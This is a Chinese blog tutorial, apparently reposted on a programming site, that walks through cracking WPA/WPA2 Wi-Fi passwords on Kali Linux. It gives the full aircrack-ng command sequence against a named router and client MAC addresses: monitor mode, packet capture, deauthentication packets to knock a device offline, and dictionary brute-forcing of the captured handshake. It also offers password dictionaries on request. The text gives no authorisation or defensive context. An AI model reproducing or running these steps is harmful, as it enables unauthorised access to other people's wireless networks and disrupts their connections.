使用KALI破解WIFI(wpa/wpa2)密码
2021/9/9 6:07:10
本文主要是介绍使用KALI破解WIFI(wpa/wpa2)密码,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
前言
本文直接使用kali操作系统进行相关操作,未使用虚拟机,在此不赘述虚拟机配置
如需要即插即用kali操作系统,可戳我。
正文
-
使用命令iwconfig,确定哪些无线解控是可用的,如图所示,无线网卡名称为wlan0。
-
使用airmon-ng命令监控无线传输,为监控模式 (monitor mode)设置拥有无线功能Kali通信接口
airmon-ng wlan0 start
- 命令返回的描述中表明有些进程可能会引起trouble,需要将其kill掉,使用命令
airmon-ng check kill
-
使用iwconfig,查看端口监听状态,如图所示,无线网卡名称已变为wlan0mon,表明监听成功。
-
使用以下命令查看本地无线环境:
airodump-ng wlan0mon
主要参数:
BSSID:标识无线接入点或路由器的MAC地址 PWR:无线功率,数值越大,信号越好 CH:广播频道 ENC:加密技术 ESSID:无线路由名称
- 检测无线网卡是否有数据包注入能力
aireplay-ng -9 wlan0mon
- 以破解名称为“TPGuest_31D2”的路由器为例,使用命令对其抓包并写入文件“/root/wifi/TPGuest_31D2”
airodump-ng wlan0mon --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
- 如果我们只有一般的数据包,是无法进行密码破解的,我们需要的是用户连接WiFi时的握手包。
- 为了能尽快得到握手包,我们需要主动发送一个反认证包,断开设备与路由器的连接,迫使他重新进行连接
aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0mon
0:表示我们正在启动一个取消鉴定攻击 10:表明我们将发送10个取消鉴定数据包 -a:目标接入点(路由器)BSSID -c:需断开的客户端MAC地址
- 注:如果注入反认证包时,提示“mom0 is on channel x,but the AP uses channel x”时,需要关掉监听
airmon-ng stop wlan0mon
关闭后,重新进行抓包写入 airodump-ng wlan0 --bssid CE:46:99:8A:31:D2 -c 1 --showack -w /root/wifi/TPGuest_31D2
再执行注入反认证包 aireplay-ng -0 10 -a CE:46:99:8A:31:D2 -c CE:60:EA:E5:68:35 wlan0
- 检测到HandShake字样后,或该设备重新上线后,结束抓包
- 接下来就交给爆破字典进行暴力破解了
aircrack-ng -w /....../password.txt /root/wifi/TPGuest_31D2.cap password.txt指代你的字典文件 TPGuest_31D2.cap为抓包写入的文件
- 提示KEY FOUND![password]时,破解成功。
- 破解是一个考验耐心的事情。可私信索取题主收藏的部分爆破字典。
这篇关于使用KALI破解WIFI(wpa/wpa2)密码的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-09-19环境变量处理课程:新手入门教程
- 2024-09-19接口模块封装课程:新手入门指南
- 2024-09-19请求动作封装课程:新手入门教程
- 2024-09-19拖拽表格课程:新手入门指南
- 2024-09-19页面权限课程:新手必学的权限管理入门教程
- 2024-09-19如何正确主动登出课程:新手必读教程
- 2024-09-19Element-Plus课程:新手入门与初级教程
- 2024-09-19Token处理入门教程:新手必看指南
- 2024-09-19如何应对被动登出课程的情况:新手必读指南
- 2024-09-19打包优化课程:初学者的必备指南